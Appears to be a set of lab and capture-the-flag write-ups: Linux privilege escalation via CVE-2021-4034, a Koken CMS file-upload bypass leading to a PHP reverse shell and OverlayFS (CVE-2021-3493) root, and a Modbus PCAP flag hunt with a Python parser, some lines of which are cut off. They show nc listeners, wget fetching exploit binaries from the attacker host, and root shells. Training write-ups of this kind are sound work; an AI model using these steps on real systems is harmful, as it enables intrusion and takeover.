  [+]  Remote  : Linux election 5.4.0-120-generic #136~18.04.1-Ubuntu SMP Fri Jun 10 18:00:44 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux

  ----------------------------------------------------------------------

  [*]  Collecting users and groups...
  [+]  Users: 45  |  Groups: 70
  [*]  Collecting sudo rules...
  [-]  sudo -l returned nothing - no sudo access or not in sudoers
  [*]  Collecting SUID/SGID binaries...
  [CRITICAL]  suid            GTFOBins SUID binary: /bin/umount
  [CRITICAL]  suid            GTFOBins SUID binary: /bin/mount
  [CRITICAL]  suid            GTFOBins SUID binary: /snap/core/7917/bin/mount
  [CRITICAL]  suid            GTFOBins SUID binary: /snap/core/7917/bin/umount
  [CRITICAL]  suid            GTFOBins SUID binary: /snap/core/7270/bin/mount
  [CRITICAL]  suid            GTFOBins SUID binary: /snap/core/7270/bin/umount
  [CRITICAL]  suid            GTFOBins SUID binary: /snap/core18/1066/bin/mount
  [CRITICAL]  suid            GTFOBins SUID binary: /snap/core18/1066/bin/umount
  [CRITICAL]  suid            GTFOBins SUID binary: /snap/core18/1223/bin/mount
  [CRITICAL]  suid            GTFOBins SUID binary: /snap/core18/1223/bin/umount
  [+]  SUID/SGID: 119  |  GTFOBins hits: 10
  [*]  Collecting privileged group memberships...
  [POTENTIAL]  groups          Member of adm - log access, possible credential leakage
  [+]  Groups: adm, cdrom, dip, love, lpadmin, plugdev, sambashare, www-data
  [*]  Collecting systemd service units...
  [CRITICAL]  services        Writable systemd unit: /etc/systemd/system/snapd.service
  [CRITICAL]  services        Writable systemd unit: /etc/systemd/system/snapd.system-shutdown.service
  [CRITICAL]  services        Writable systemd unit: /etc/systemd/system/snapd.core-fixup.service
  [CRITICAL]  services        Writable systemd unit: /etc/systemd/system/snapd.autoimport.service
  [CRITICAL]  services        Writable systemd unit: /etc/systemd/system/snapd.seeded.service
  [CRITICAL]  services        Writable systemd unit: /etc/systemd/system/apparmor.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/mountnfs-bootclean.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/bootmisc.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/hwclock.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/mountkernfs.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/cryptdisks-early.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/saned.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/x11-common.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/mountall.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/checkfs.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/reboot.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/killprocs.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/rc.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/fuse.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/checkroot.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/halt.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/umountfs.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/checkroot-bootclean.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/mountall-bootclean.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/hostname.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/rmnologin.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/mountnfs.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/motd.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/umountroot.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/single.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/sendsigs.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/bootlogs.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/umountnfs.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/stop-bootlogd-single.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/stop-bootlogd.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/mountdevsubfs.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/alsa-utils.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/sudo.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/rcS.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/bootlogd.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/cryptdisks.service
  [+]  Units scanned: 366  |  Writable: 41
  [*]  Collecting cron jobs and scheduled tasks...
  [+]  Cron entries collected: 1
  [*]  Collecting kernel information...
  [HIGH    ]  kernel          Kernel 5.4.0-120-generic may be vulnerable to CVE-2021-4034
  [HIGH    ]  kernel          Kernel 5.4.0-120-generic may be vulnerable to CVE-2021-3156
  [HIGH    ]  kernel          Kernel 5.4.0-120-generic may be vulnerable to CVE-2022-0847
  [+]  Kernel: 5.4.0-120-generic  |  CVE matches: 3
  [*]  Collecting container and cloud context...
  [+]  Docker socket: False  |  In container: False
  [*]  Collecting network information...
  [POTENTIAL]  network         Interesting internal service: mysql (port 3306): tcp    LISTEN   0        80              127.0.0.1:3306           0.0.0.0:*
  [+]  Interfaces: 1  |  Interesting services: 1
  [*]  Collecting environment and interesting files...
  [CRITICAL]  env             CTF flag file: /home/love/Desktop/user.txt
  [HIGH    ]  env             Sensitive commands in history: /home/love/.bash_history
  [+]  Env collected  |  Interesting files: 16
  [*]  Running SACSPengu module - compiler and binary analysis...
  [POTENTIAL]  sacspengu       Compiler/interpreter: gcc -> /usr/bin/gcc
  [POTENTIAL]  sacspengu       Compiler/interpreter: cc -> /usr/bin/cc
  [POTENTIAL]  sacspengu       Compiler/interpreter: c89 -> /usr/bin/c89
  [POTENTIAL]  sacspengu       Compiler/interpreter: c99 -> /usr/bin/c99
  [POTENTIAL]  sacspengu       Compiler/interpreter: make -> /usr/bin/make
  [POTENTIAL]  sacspengu       Compiler/interpreter: python -> /usr/bin/python
  [POTENTIAL]  sacspengu       Compiler/interpreter: python3 -> /usr/bin/python3
  [POTENTIAL]  sacspengu       Compiler/interpreter: python2 -> /usr/bin/python2
  [POTENTIAL]  sacspengu       Compiler/interpreter: perl -> /usr/bin/perl
  [POTENTIAL]  sacspengu       Compiler/interpreter: php -> /usr/bin/php
  [POTENTIAL]  sacspengu       Compiler/interpreter: as -> /usr/bin/as
  [POTENTIAL]  sacspengu       Compiler/interpreter: ld -> /usr/bin/ld
  [POTENTIAL]  sacspengu       Compiler/interpreter: ar -> /usr/bin/ar
  [POTENTIAL]  sacspengu       Compiler/interpreter: nm -> /usr/bin/nm
  [POTENTIAL]  sacspengu       Compiler/interpreter: objdump -> /usr/bin/objdump
  [POTENTIAL]  sacspengu       Compiler/interpreter: strip -> /usr/bin/strip
  [POTENTIAL]  sacspengu       Compiler/interpreter: readelf -> /usr/bin/readelf
  [CRITICAL]  sacspengu       Dangerous capability: /usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
  [+]  Compilers: 17  |  Writable PATH dirs: 0  |  Capabilities scanned

  ----------------------------------------------------------------------

  [+]  Collection complete in 88.01s

  [CRITICAL ]  53
  [HIGH     ]  4
  [POTENTIAL]  19

  [~]  Total findings  :  76
  [~]  Graph nodes     :  523
  [~]  Graph edges     :  228
  [~]  Output file     :  out.json

  [+]  Import out.json into BloodPengu via Import JSON

  ----------------------------------------------------------------------

  gxc-BloodPengu.py v1.3.9 by <@byt3n33dl3>

Dope, we got the JSON file to digest in BloodPengu, PS: this is BloodPengu.py version 1.3.9 “Kraken Husk“, changes might be added in future!

┌──(kali㉿kali)-[~]
└─$ ls
out.json

And this is what BloodPengu saw:

I think this is LARGE!

We have 3 Kernel Exploit according to this attack-paths

One of them are CVE-2021-4034, so we can just start to create or find a script for it.

I’m going to use this:

github.com/sickcodes/CVE-2021-4035

Let’s run it. . .!!

love@election:/tmp$ id
uid=1000(love) gid=1000(love) groups=1000(love),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),116(lpadmin),126(sambashare)
love@election:/tmp$ bash pwn.sh
cc -Wall --shared -fPIC -o n3on.so n3on.c
cc -Wall    oneline.c   -o oneline
echo "module UTF-8// N3ON// n3on 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp /bin/true GCONV_PATH=./n3on.so:.
# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),116(lpadmin),126(sambashare),1000(love)

And now we are root.

One second we are local user, next second we’re root.

Happy hacking!

Infra Assessor from WebApp to Local Machine: Part 23

Sulaiman — Sun, 01 Mar 2026 06:32:05 GMT

Offensive Security

On this another internal Pentesting practices, all we got is an IP Address:

192.168.221.76

Start with:

Network Enumeration and Port Discovery

┌──(kali㉿kali)-[~]
└─$ ping -c2 192.168.221.76
PING 192.168.221.76 (192.168.221.76) 56(84) bytes of data.
64 bytes from 192.168.221.76: icmp_seq=1 ttl=61 time=20.3 ms
64 bytes from 192.168.221.76: icmp_seq=2 ttl=61 time=19.6 ms

--- 192.168.221.76 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1023ms
rtt min/avg/max/mdev = 19.601/19.939/20.277/0.338 ms

Continue with NMAP Scanning:

┌──(kali㉿kali)-[~]
└─$ sudo nmap -Pn -p- --min-rate 8000 192.168.221.76 -oA nmap/nmapscan                                         
Starting Nmap 7.95 ( https://nmap.org ) at
Nmap scan report for 192.168.221.76
Host is up (0.024s latency).
Not shown: 65530 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
8000/tcp open  http-alt

Nmap done: 1 IP address (1 host up) scanned in seconds

┌──(kali㉿kali)-[~]
└─$ sudo nmap -Pn -p22,80,139,445,8000 -sC -sV 192.168.221.76 -oA nmap/nmapscan-ports
Starting Nmap 7.95 ( https://nmap.org ) at 
Nmap scan report for 192.168.221.76
Host is up (0.020s latency).

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 41:4d:aa:18:86:94:8e:88:a7:4c:6b:42:60:76:f1:4f (RSA)
|   256 4d:a3:d0:7a:8f:64:ef:82:45:2d:01:13:18:b7:e0:13 (ECDSA)
|_  256 1a:01:7a:4f:cf:95:85:bf:31:a1:4f:15:87:ab:94:e2 (ED25519)
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Photographer by v1n1v131r4
|_http-server-header: Apache/2.4.18 (Ubuntu)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8000/tcp open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-title: daisa ahomi
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-generator: Koken 0.22.24
Service Info: Host: PHOTOGRAPHER; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: photographer
|   NetBIOS computer name: PHOTOGRAPHER\x00
|   Domain name: \x00
|   FQDN: photographer
|_  System time: 2026-03-01T00:31:39-05:00
|_clock-skew: mean: 1h40m01s, deviation: 2h53m12s, median: 1s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2026-03-01T05:31:39
|_  start_date: N/A
|_nbstat: NetBIOS name: PHOTOGRAPHER, NetBIOS user: , NetBIOS MAC:  (unknown)
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in seconds

As we saw here, we have 2 HTTP, and uniquely an SMB shares in this Linux based machine.

Let’s start with the HTTP on Port 80, even I have a great feeling the vuln it’s on Port 8000 (the second Web) based on NMAP Fingerprint.

HTTP Enumeration

Let’s do manual first on Port 80.

After just 5 seconds,

This Web app is static and not interesting, let’s move to the next Port:

Now we’re on a Web that’s based on something.

Looking back at NMAP fingerprint the Web based could have a CVE:

┌──(kali㉿kali)-[~]
└─$ searchsploit Koken 0.22.24
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                                                             |  Path
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Koken CMS 0.22.24 - Arbitrary File Upload (Authenticated)                                                                                                                                                  | php/webapps/48706.txt
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

And yep, it’s says File Upload (with Authentication), I believe we’re on a right track so let’s continue.

Regarding credential, I have a great feeling this could be retrieve from:

Web Discovery
SMB Share Discovery

Let’s SMB Share first.

Guest Account SMB Enumeration

Here we can use Guest account for the SMB Enumeration:

┌──(kali㉿kali)-[~]
└─$ sudo nxc smb 192.168.221.76 -u '' -p ''
SMB         192.168.221.76  445    PHOTOGRAPHER     [*] Unix - Samba (name:PHOTOGRAPHER) (domain:) (signing:False) (SMBv1:True) 
SMB         192.168.221.76  445    PHOTOGRAPHER     [+] \: (Guest)

┌──(kali㉿kali)-[~]
└─$ sudo nxc smb 192.168.221.76 -u '' -p '' --shares
SMB         192.168.221.76  445    PHOTOGRAPHER     [*] Unix - Samba (name:PHOTOGRAPHER) (domain:) (signing:False) (SMBv1:True) 
SMB         192.168.221.76  445    PHOTOGRAPHER     [+] \: (Guest)
SMB         192.168.221.76  445    PHOTOGRAPHER     [*] Enumerated shares
SMB         192.168.221.76  445    PHOTOGRAPHER     Share           Permissions     Remark
SMB         192.168.221.76  445    PHOTOGRAPHER     -----           -----------     ------
SMB         192.168.221.76  445    PHOTOGRAPHER     print$                          Printer Drivers
SMB         192.168.221.76  445    PHOTOGRAPHER     sambashare      READ            Samba on Ubuntu
SMB         192.168.221.76  445    PHOTOGRAPHER     IPC$                            IPC Service (photographer server (Samba, Ubuntu))

And we have one read access.

┌──(kali㉿kali)-[~]
└─$ sudo smbclient \\\\192.168.221.76\\sambashare -U guest
Password for [WORKGROUP\guest]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Aug 20 15:51:08 2020
  ..                                  D        0  Thu Aug 20 16:08:59 2020
  mailsent.txt                        N      503  Tue Jul 21 01:29:40 2020
  wordpress.bkp.zip                   N 13930308  Tue Jul 21 01:22:23 2020

                3300080 blocks of size 1024. 2958792 blocks available
smb: \> mget *
Get file mailsent.txt? y
getting file \mailsent.txt of size 503 as mailsent.txt (6.2 KiloBytes/sec) (average 6.2 KiloBytes/sec)
Get file wordpress.bkp.zip? y
getting file \wordpress.bkp.zip of size 13930308 as wordpress.bkp.zip (6734.6 KiloBytes/sec) (average 6481.3 KiloBytes/sec)
smb: \>

Let’s see what’s inside on the TXT and Zip files.

┌──(kali㉿kali)-[~]
└─$ ll
total 13608
-rw-r--r-- 1 root root      503 Mar  1 05:33 mailsent.txt
-rw-r--r-- 1 root root 13930308 Mar  1 05:33 wordpress.bkp.zip

The Word Press Huge file, and not very useful:

┌──(kali㉿kali)-[~]
└─$ tree . | grep config       
│   ├── setup-config.php
├── wp-config-sample.php
│   │   │   │   ├── config.php
│       │   ├── postcss.config.js

┌──(kali㉿kali)-[~]
└─$ cat mailsent.txt                         
Message-ID: <4129F3CA.2020509@dc.edu>
Date: Mon, 20 Jul 2020 11:40:36 -0400
From: Agi Clarence 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.1) Gecko/20020823 Netscape/7.0
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: Daisa Ahomi 
Subject: To Do - Daisa Website's
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit

Hi Daisa!
Your site is ready now.
Don't forget your secret, my babygirl ;)

This is the Juicy file, from this TXT file we can have the User email for Logon, and a password lists, and turns-out the password is babygirl.

So now we have a pair for Web logon:

user: daisa@photographer.com
passwd: babygirl

Web Logon and Pentesting

Is it valid?

Yep!

Now we needed to Upload the malicious File in here:

For the reverse Shell I’m just going to use www.revshells.com and choose the PHP file.

PS: A little bit technique here on the File Upload vulnerability, we need to add extra file type:

So example as rev.php file, change it to rev.php.png

We needed to intercept the request to then remove the image extension from the Content, releasing only .PHP in last.

Remove the .PNG leaving only .PHP at last.

Initial Access

Let’s check our listener and . . .Profit!!

┌──(kali㉿kali)-[~]
└─$ sudo nc -lvnp 9001
listening on [any] 9001 ...
connect to [192.168.45.214] from (UNKNOWN) [192.168.221.76] 53780
SOCKET: Shell has connected! PID: 2776
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
whoami
www-data
which python3
/usr/bin/python3

I change my Session with Python for better TTY tho.

www-data@photographer:/var/www/html/koken/storage/originals/c0/c8$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

www-data@photographer:/var/www/html/koken/storage/originals/c0/c8$ cd /home
cd /home
www-data@photographer:/home$ ls
ls
agi  daisa  lost+found

www-data@photographer:/home$ cd daisa
cd daisa
www-data@photographer:/home/daisa$ ls
ls
Desktop    Downloads  Pictures  Templates  examples.desktop  user.txt
Documents  Music      Public    Videos     local.txt

Looking at the internal File structure, if our path-way to PrivEsc is via unique file this could take forever.

Let’s try BloodPengu.

PrivEsc Enumeration with BloodPengu

First we need a Collector, but for perfect binary I’m first going to just download SACSPengu for the Compiler suggestion then PyPengu and run it on /tmp directory:

www-data@photographer:/tmp$ bash sacspengu.sh
bash sacspengu.sh

SACSPengu v1.0.0
-----------------------------------

Target: photographer
User: www-data (UID: 33)

System Fingerprint
-----------------------------------
Kernel: Linux 4.15.0-115-generic
Distribution: Ubuntu 16.04 (xenial)
Architecture: x86_64
CPU: AMD EPYC 7413 24-Core Processor (1 cores)
Memory: 1.9G
Virtualization: vmware

C Library Detection
-----------------------------------
[!] GLIBC 2.23 detected (OLD)

Compiler Analysis
-----------------------------------
[-] Go not installed on target

Architecture Mapping
-----------------------------------
GOARCH: amd64

Storage Analysis
-----------------------------------
[+] /tmp (950M free)
[+] /var/tmp (950M free)
[+] /dev/shm (997M free)


PyPengu Compilation Command
-----------------------------------

[-] Target lacks Go compiler

Cross-compile on your machine:

CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build -a -ldflags '-extldflags "-static"' -o pypengu-static ./cmd/pypengu

Transfer Methods
. . .[SNIP]. . .

Okay:

CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build -a -ldflags '-extldflags "-static"' -o pypengu-static ./cmd/pypengu

Now we have PyPengu for it:

www-data@photographer:/tmp$ wget http://192.168.45.214/pypengu
wget http://192.168.45.214/pypengu
--2026-03-01 00:51:33--  http://192.168.45.214/pypengu
Connecting to 192.168.45.214:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3377146 (3.2M) [application/octet-stream]
Saving to: 'pypengu'

pypengu             100%[===================>]   3.22M  3.73MB/s    in 0.9s    

2026-03-01 00:51:34 (3.73 MB/s) - 'pypengu' saved [3377146/3377146]

www-data@photographer:/tmp$ chmod +x pypengu
chmod +x pypengu
www-data@photographer:/tmp$ ./pypengu -v
./pypengu -v
PyPengu: Linux PrivEsc Data Collector
Version: 1.0.0
Collecting data...

[*] Collecting users...
    Found 45 users
[*] Collecting groups...
    Found 72 groups
[*] Collecting sudo configuration...
[sudo] password for www-data: 

[sudo] password for www-data: 

[sudo] password for www-data: 

    [-] Could not run sudo -l
    Found 0 sudo entries
[*] Scanning for SUID binaries...
    Found 24 SUID binaries
[*] Checking Docker access...
[*] Scanning services...
    Found 137 writable services
[*] Scanning cron jobs...
    Found 0 cron jobs
[*] Checking kernel version...
    Kernel: 4.15.0-115-generic
    Found 1 potential CVEs
[*] Building graph...

[+] Data collected successfully
[+] Output: pypengu-output.json
[+] Nodes: 278 | Edges: 172 | Paths to root: 0

Let’s import this JSON File back to Our Kali and see any Path-ways.

I see we have 1 Path to root via Kernel CVE

And it’s an OverlayFS under CVE-2021-3493.

Let’s do it.

Gain root Access via OverlayFS Exploit

Here’s a GitHub repo I found useful:

github.com/briskets/CVE-2021-3493

Let’s just compile it:

www-data@photographer:/tmp$ uname -a
uname -a
Linux photographer 4.15.0-115-generic #116~16.04.1-Ubuntu SMP Wed Aug 26 17:36:48 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

That’s the Target machine, so now we need to specify -static mode:

┌──(kali㉿kali)-[~]
└─$ sudo gcc pwn.c -o pwn -static

Then we import our binary (pwn) into target:

www-data@photographer:/tmp$ wget http://192.168.45.214/pwn
wget http://192.168.45.214/pwn
--2026-03-01 00:57:44--  http://192.168.45.214/pwn
Connecting to 192.168.45.214:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 819240 (800K) [application/octet-stream]
Saving to: 'pwn'

pwn                 100%[===================>] 800.04K  3.36MB/s    in 0.2s    

2026-03-01 00:57:44 (3.36 MB/s) - 'pwn' saved [819240/819240]

www-data@photographer:/tmp$ chmod +x pwn
chmod +x pwn

And . . .Done!

www-data@photographer:/tmp$ ./pwn
./pwn
bash-4.3# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
bash-4.3# whoami
whoami
root

We successfully gain Administrator.

Happy hacking!

WireShark Dumping Upon Pwn3d! ICS Networks

Sulaiman — Sun, 01 Mar 2026 02:37:53 GMT

ICS CTF

All we got is a singular PCAP file.

┌──(kali㉿kali)-[~]
└─$ ll
total 16
-rw-r--r-- 1 root root 12778 May 17  2024 traffic.pcapng

Let’s open it.

In the inside PCAP file, some Length, Code, and other indicators have little to separator between normal and none, but after careful examination, we can see that the Length could be delivering something:

Some are higher than 100, others reach up-to 200+

Btw from here we know its a Modbus is an old industrial communication protocol used by PLCs.

The traffic tells us that device at 192.168.178.23 repeatedly querying a PLC at 192.168.178.105 using Function Code 102.

Let’s look-up for some Length that’s beyond score 90:

frame.len > 90 && modbus && tcp.port == 502

And we only left with this, not long after we found the flag on the Length of 123:

That’s basically it, but further enhancement we can create a Python script that in future could eliminate Length/Other filters as separator.

First let’s see the Headers, since it’s says PcapNG but let’s just see it first:

import sys
import struct

with open(sys.argv[1], 'rb') as f:
    data = f.read()

print(f"File size: {len(data)} bytes")
print(f"First 16 bytes: {data[:16].hex()}")

offset = 0
count = 0
while offset < len(data) and count < 20:
    if offset + 8 > len(data):
        break
    block_type = struct.unpack_from('

┌──(kali㉿kali)-[~]
└─$ sudo python3 dump.py traffic.pcapng
File size: 12778 bytes
First 16 bytes: d4c3b2a1020004000000000000000000
offset=0x00000000 block_type=0xa1b2c3d4 block_len=262146

And yep, the file might be using a legacy PCAP format: magic d4c3b2a1 or a1b2c3d4, instead of PcapNG.

Let’s create the script following header of d4c3b2a1 which means little-endian classic PCAP.

#!/usr/bin/env python3
import sys
import struct
import argparse


def parse_pcap(filepath):
    packets = []
    with open(filepath, 'rb') as f:
        data = f.read()

    magic = struct.unpack_from(' len(data):
            break
        incl_len = struct.unpack_from(endian + 'I', data, offset + 8)[0]
        orig_len = struct.unpack_from(endian + 'I', data, offset + 12)[0]
        pkt_data = data[offset + 16: offset + 16 + incl_len]
        packets.append((orig_len, pkt_data))
        offset += 16 + incl_len

    return packets


def extract_modbus_data(pkt_data):
    if len(pkt_data) < 14:
        return None, None

    eth_type = struct.unpack_from('>H', pkt_data, 12)[0]
    if eth_type != 0x0800:
        return None, None

    ip_offset = 14
    if ip_offset + 20 > len(pkt_data):
        return None, None

    ihl   = (pkt_data[ip_offset] & 0x0F) * 4
    proto = pkt_data[ip_offset + 9]

    if proto != 6:
        return None, None

    tcp_offset = ip_offset + ihl
    if tcp_offset + 20 > len(pkt_data):
        return None, None

    tcp_data_offset = ((pkt_data[tcp_offset + 12] >> 4) & 0xF) * 4
    src_port = struct.unpack_from('>H', pkt_data, tcp_offset)[0]
    dst_port = struct.unpack_from('>H', pkt_data, tcp_offset + 2)[0]

    if 502 not in (src_port, dst_port):
        return None, None

    payload_offset = tcp_offset + tcp_data_offset
    payload = pkt_data[payload_offset:]

    if len(payload) < 8:
        return None, None

    transaction_id = struct.unpack_from('>H', payload, 0)[0]
    protocol_id    = struct.unpack_from('>H', payload, 2)[0]
    length         = struct.unpack_from('>H', payload, 4)[0]
    unit_id        = payload[6]
    func_code      = payload[7]
    modbus_data    = payload[8:]

    info = {
        'transaction_id': transaction_id,
        'protocol_id':    protocol_id,
        'length':         length,
        'unit_id':        unit_id,
        'func_code':      func_code,
        'src_port':       src_port,
        'dst_port':       dst_port,
    }

    return info, modbus_data


def hexdump(data, indent=4):
    lines = []
    pad = ' ' * indent
    for i in range(0, len(data), 16):
        chunk = data[i:i+16]
        hex_part = ' '.join(f'{b:02x}' for b in chunk)
        asc_part = ''.join(chr(b) if 32 <= b < 127 else '.' for b in chunk)
        lines.append(f'{pad}{i:04x}  {hex_part:<47}  {asc_part}')
    return '\n'.join(lines)


def main():
    parser = argparse.ArgumentParser()
    parser.add_argument('pcap')
    parser.add_argument('--threshold', '-t', type=int, default=90)
    parser.add_argument('--raw',   action='store_true')
    parser.add_argument('--ascii', action='store_true')
    args = parser.parse_args()

    packets = parse_pcap(args.pcap)

    if not packets:
        print('No packets parsed.')
        sys.exit(1)

    found = 0
    for idx, (frame_len, pkt_data) in enumerate(packets, start=1):
        if frame_len <= args.threshold:
            continue

        info, modbus_data = extract_modbus_data(pkt_data)
        if info is None:
            continue

        found += 1
        direction = 'Query' if info['dst_port'] == 502 else 'Response'

        print('=' * 72)
        print(f'Packet #{idx}')
        print(f'  Frame Length   : {frame_len} bytes')
        print(f'  Direction      : {direction}')
        print(f'  Transaction ID : {info["transaction_id"]}')
        print(f'  Unit ID        : {info["unit_id"]}')
        print(f'  Function Code  : {info["func_code"]} (0x{info["func_code"]:02x})')
        print(f'  Modbus Length  : {info["length"]}')
        print(f'  Data Length    : {len(modbus_data)} bytes')

        if not args.raw and not args.ascii:
            print('  Hex Dump:')
            print(hexdump(modbus_data))
            printable = ''.join(chr(b) if 32 <= b < 127 else '.' for b in modbus_data)
            print(f'  ASCII          : {printable}')

        elif args.raw:
            print(modbus_data.hex())

        elif args.ascii:
            printable = ''.join(chr(b) if 32 <= b < 127 else '.' for b in modbus_data)
            print(f'  ASCII          : {printable}')

    print('=' * 72)
    if found == 0:
        print(f'No Modbus packets found exceeding {args.threshold} bytes.')
    else:
        print(f'Total anomalous packets found: {found}')


if __name__ == '__main__':
    main()

┌──(kali㉿kali)-[~]
└─$ python3 dump.py traffic.pcapng
========================================================================
Packet #6
  Frame Length   : 275 bytes
  Direction      : Response
  Transaction ID : 1
  Unit ID        : 0
  Function Code  : 3 (0x03)
  Modbus Length  : 203
  Data Length    : 201 bytes
  Hex Dump:
    0000  c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    0010  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    0020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    0030  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    0040  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    0050  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    0060  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    0070  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    0080  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    0090  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    00a0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    00b0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    00c0  00 00 00 00 00 00 00 00 00                       .........
  ASCII          : .........................................................................................................................................................................................................
========================================================================
Packet #29
  Frame Length   : 275 bytes
  Direction      : Response
  Transaction ID : 2
  Unit ID        : 0
  Function Code  : 3 (0x03)
  Modbus Length  : 203
  Data Length    : 201 bytes
  Hex Dump:
    0000  c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    0010  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    0020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    0030  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    0040  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    0050  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    0060  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    0070  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    0080  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    0090  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    00a0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    00b0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    00c0  00 00 00 00 00 00 00 00 00                       .........
  ASCII          : .........................................................................................................................................................................................................
========================================================================
Packet #35
  Frame Length   : 123 bytes
  Direction      : Query
  Transaction ID : 12
  Unit ID        : 0
  Function Code  : 102 (0x66)
  Modbus Length  : 51
  Data Length    : 49 bytes
  Hex Dump:
    0000  00 10 2e 48 54 42 7b 35 30 6d 33 37 31 6d 33 35  ...HTB{50m371m35
